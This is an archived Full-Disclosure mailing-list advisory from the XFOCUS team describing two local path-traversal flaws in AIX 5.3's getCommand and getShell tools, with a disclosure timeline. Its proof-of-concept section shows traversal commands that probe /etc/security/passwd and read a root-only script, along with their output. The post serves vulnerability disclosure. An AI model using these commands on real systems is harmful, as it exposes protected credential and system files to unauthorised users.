Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | [Full-disclosure] [xfocus-SD-060101]AIX getCommand&getShell two vulnerabilities |
|---|---|
| Date: | Sun, 01 Jan 2006 16:19:35 +0800 |
Title:[xfocus-SD-060101]AIX getCommand&getShell two vulnerabilities
Affected version : aix5.3 ml03,Other versions not test,
should also be affected.
Vendor: http://www.ibm.com/
Where: Local
XFOCUS (http://www.xfocus.org) had already discovered
some vulnerabilities in getCommand&getShell.
After apply newest patch,getCommand&getShell still have two
vulnerabilities,That is
1: exploit that,a attacker can determine file be exist or not,which
should can't readed
2: exploit that,a attacker can read in any shell document(include no
permission file) has the cd operation the following partial content.
example test:
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
fopen: No such file or directory
-bash-3.00$ ls -ld /etc/security/
drwxr-x--- 4 root security 512 2005-12-22 21:09 /etc/security/
-bash-3.00$ ls -l /tmp/k.sh -rwx------ 1 root system 79 2005-12-22 23:40
/tmp/k.sh
-bash-3.00$./getCommand.new ../../../../../tmp/k.sh
ps -ef > /tmp/log. $$
grep test /tmp/log.
$$ rm /tmp/log. $$
-bash-3.00$
TIME LINE:
December,26 2005 - Initial vendor notification
.....Waiting.....Waiting....
January 1, 2006 - Public disclosure(vendor not reply)
--EOF
--
Kind Regards,
---
XFOCUS Security Team
http://www.xfocus.org
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Next by Date: | [Full-disclosure] RE: Download Accelerator Plus can be tricked to download malicious file, NaPa |
|---|---|
| Next by Thread: | [Full-disclosure] RE: Download Accelerator Plus can be tricked to download malicious file, NaPa |
| Indexes: | [Date] [Thread] [Top] [All Lists] |